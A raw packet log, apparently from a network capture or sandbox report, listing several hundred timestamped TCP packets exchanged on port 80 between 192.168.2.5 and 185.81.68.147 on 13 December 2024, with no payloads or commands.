Dec 13, 2024 01:37:36.144810915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144825935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144922018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144936085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.144963026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145031929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145031929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145051003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145073891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145123959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145148039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145163059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145189047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145204067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145251989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145266056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145298958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145313978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.145327091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148709059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148732901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148755074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148772955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148797989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148811102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148835897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148850918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148875952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148886919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148911953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148925066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148947954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148962021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148984909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.148998976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149022102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149038076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149056911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149158001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149188995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149204016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149226904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149243116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149307966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149322033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149348021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149360895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149415970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149446964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149461031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149482012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149494886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149553061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149586916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149604082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149625063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149640083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149668932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149682999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149703979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149823904 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.149832964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.149856091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149883986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149897099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149916887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149930954 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149951935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149965048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.149988890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150005102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150032043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150044918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150065899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150067091 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150084019 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150084019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150098085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150114059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150119066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150122881 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150134087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150154114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150157928 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150168896 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150182009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150197029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150204897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150296926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150326014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150345087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150422096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150422096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150433064 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150441885 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150446892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150463104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150464058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150475979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150487900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150490999 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150506973 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150517941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150533915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150542021 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150542021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150559902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150567055 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150574923 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150583982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150599957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150639057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150646925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150648117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150669098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150686026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150708914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150723934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150748014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150763988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.150832891 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150840998 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150857925 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150871038 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150887012 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150896072 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150916100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.150923967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151226044 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151235104 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151254892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151264906 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151276112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151490927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151503086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151524067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151530981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151660919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151668072 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151674986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151681900 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151690960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151699066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.151706934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.152261972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152333021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152359962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152373075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152395010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152409077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152427912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152441978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152465105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152479887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152503967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152517080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152714968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152740955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152755022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152780056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152795076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152818918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152832031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152856112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152868986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152890921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152904034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152925968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152941942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152965069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.152978897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153002977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153018951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153044939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153059006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153079987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153094053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153115034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153206110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153233051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153256893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153331995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153366089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153393030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153474092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153500080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153522968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153592110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153628111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153660059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153687000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153712988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153733969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.153763056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154006004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154043913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154069901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154105902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154197931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154213905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154264927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154290915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154320002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154356003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154508114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154568911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154594898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154619932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154635906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154666901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154720068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154720068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154741049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154764891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154793024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154835939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154885054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.154907942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155169010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155255079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155278921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155306101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155320883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155390024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155411959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155430079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155458927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155472040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155498028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155514956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155539036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155553102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155580997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155786037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155817032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155832052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155859947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155874014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155901909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155916929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155946016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155958891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.155987978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156001091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156027079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156040907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156068087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156081915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156111002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156125069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156151056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156164885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156191111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156205893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156337976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156373978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156389952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156397104 CET	80	49770	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.156478882 CET	49770	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156510115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156524897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156610966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156645060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156666994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156730890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156744957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156779051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156794071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156816959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156830072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156861067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.156883001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157079935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157119036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157135010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157162905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157176971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157202005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157217026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157248020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157260895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157288074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157301903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157326937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157356024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157370090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157391071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157416105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157428980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157433987 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157443047 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157454014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157507896 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157524109 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157533884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157634020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157650948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157674074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157696962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157757044 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157763958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157767057 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157797098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157834053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157864094 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157872915 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157891035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157898903 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157927036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157963037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157970905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.157987118 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.157991886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158083916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158098936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158118963 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158137083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158138037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158164024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158165932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158185005 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158189058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158195019 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158212900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158243895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158265114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158301115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158344030 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158351898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.158467054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158500910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158516884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158544064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158561945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158587933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158598900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158626080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158639908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158668995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.158682108 CET	49775	80	192.168.2.5	185.81.68.147
